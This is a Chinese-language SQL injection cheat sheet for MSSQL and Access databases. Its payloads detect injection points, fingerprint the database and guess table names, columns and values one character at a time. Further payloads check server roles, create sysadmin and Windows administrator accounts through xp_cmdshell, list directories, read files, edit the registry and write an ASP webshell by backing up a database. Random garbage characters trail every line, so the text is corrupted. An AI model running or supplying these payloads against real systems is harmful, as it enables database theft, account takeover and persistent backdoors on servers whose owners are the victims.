1.判断是否有注入;and 1=1 ;and 1=2 |��I \&r[J
2.初步判断是否是mssql ;and user>0 o?5m^S14[1
W'l�ejOi�w
3.注入参数是字符'and [查询条件] and ''=' ~j3O0�s<gK
89n�\$7Ff9
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �X\&CQiPS�
�S7a05NO��
5.判断数据库系统 w]�1ho�YuV
,6V�Y S\a3
;and (select count(*) from sysobjects)>0 mssql X��6 �E^5m
r c+�+c,=
;and (select count(*) from msysobjects)>0 access Q�l�>bsr�}
4Ys\<\~d
(-S\�%,h�O
ak1�?MKV.�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 |Yb]@9�>vn
zu/�BDy�F
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ���cPunMHD
cvOCBg38BH
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 (E(J}r~E��
T8^�`<g�r.
9.(1)猜字段的ascii值(access) Ob!����NC&
2����n�ra@
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 VN3�[B
eH
^5E:hW��[*
(2)猜字段的ascii值(mssql) 6�5�]>6D43
*? V bo�yU
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ^���k J�>4
[/�=Z2mt�A
10.测试权限结构(mssql) �d!57`bVOd
&�ci;0�P#Q
Q Uy7�Q$W�
��i�8w/�a�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ~#�MX�hhqB
b�
I"+b\�K
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ^iA_<@[`X[
LO�;��7�NK
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- m+�|yk.�md
k%�D|1�7I�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- j���e;C�}4
Uc%kyT�Bm1
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ���#nq$^�H
M�"\�Iw'5$
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- {�"PIS&]tR
%�fu���V�]
;and 1=(select IS_MEMBER('db_owner'));-- 3�QI.�|;X�
'2z1$zst,#
^V}c8 P|��
]A=yj@o$xN
11.添加mssql和系统的帐户 8��/�v�GA=
*Z8qd{.$q�
;exec master.dbo.sp_addlogin username;-- :X*$�U
~aQ
;exec master.dbo.sp_password null,username,password;-- S:lie*Aux*
��eC�{St0�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ��8AVt�U�U
?��ES�sma6
;exec master.dbo.xp_cmdshell 'net user username password K�PjC<9sby
�2�W�K c;?
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �+R�8G�*�2
1�'�B&��e)
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �)��Tf�X}�
;R�K;kdZ��
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �&j}:8Tst
W"�Tj.oCUG
#=V��\�WQb
:u�]QEZ�@@
12.(1)遍历目录 ;#bDz}|\AN
:\Q#W4�~p�
;create table dirs(paths varchar(100), id int) �e_YTh^wU�
6bD���izS}
;insert dirs exec master.dbo.xp_dirtree 'c:\' d�OT7;@���
7#&e0fw�/I
;and (select top 1 paths from dirs)>0 %�(1Jt�"9|
f��"z��;�'
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) T' =6_?7K4
+�!Q�*ie+q
_v��[gJ(F
u!-v1O^[��
(2)遍历目录 4L bll%�[9
[�*J?��TNk
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- :�85Qw�N]\
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 WF�_�v>g:g
gNJdP�!(t
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 11vA���x9�
EQ�tY�b"_�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �5�?Ukf$)x
oj�/#w�F+�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 I5@8=��rFk
�K�&VMhMVb
r=HL!XFk�
;i��?rd� f
13.mssql中的存储过程 G<-�<>)zO!
Hqtv��`3g
xp_regenumvalues 注册表根键, 子键 )(9[>�_+40
^z�`d�2it
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 3bR�W]mP�8
�sd�%m{P2�
xp_regread 根键,子键,键值名 6p9 {��z42
�}_B�Ni;�H
;exec xp_regread nAC>�']K4$
�E�un�mc�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 lc�3N i<3v
a�!EW[|[�Q
xp_regwrite 根键,子键, 值名, 值类型, 值 �;�t�� M��
�U�[?�f@.&
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 $�>7T �s>8
j#�Q�nu0�D
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ��^�(s(4|
erKi�*GssZ
xp_regdeletevalue 根键,子键,值名 O!t�=,�F1j
Ih�N^*P:Fo
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 lM�l'+ �yy
�8|(],NyEJ
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 /�'/i?�9:�
4jc�?9(y�%
vjzG
��H*�
5�B���t~tt
14.mssql的backup创建webshell �$<9u:.9xf
� �|e<��$�
use model �9 p,O>�I�
(_�]!}�N��
create table cmd(str image); ;b�(�ww{�&
(*b<IG�i�;
insert into cmd(str) values (''); � X�r:s-�L
:��dQRr�mM
backup database model to disk='c:\l.asp'; P4zwT��Ek`
(xE |�T �f
/M JI^\C�A
qyAn��q%B}
15.mssql内置函数 l-P6B�9e|\
���5KfrkZ�
;and (select @@version)>0 获得Windows的版本号 N/��'8W9#6
G3 |x%/Fbp
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ,!,�tU7-H�
^?wR{�q"8�
;and (select user_name())>0 爆当前系统的连接用户 M.x�ZU\'ty
D2GF4��%|�
;and (select db_name())>0 得到当前连接的数据库 F��v*QcB9K
_%e�r,�Ed
(S4�HU_,88
�L��[O�t$�
16.简洁的webshell Nw*�F1*�v`
61b*uoq0w?
use model oHr0;4L�g6
Ms�Bm�0r`a
create table cmd(str image); I��M�ncl=1
r{�B28'f�[
insert into cmd(str) values (''); �B;S'l|-?�
�#
E_�S�..
backup database model to disk='g:\wwwtest\l.asp';
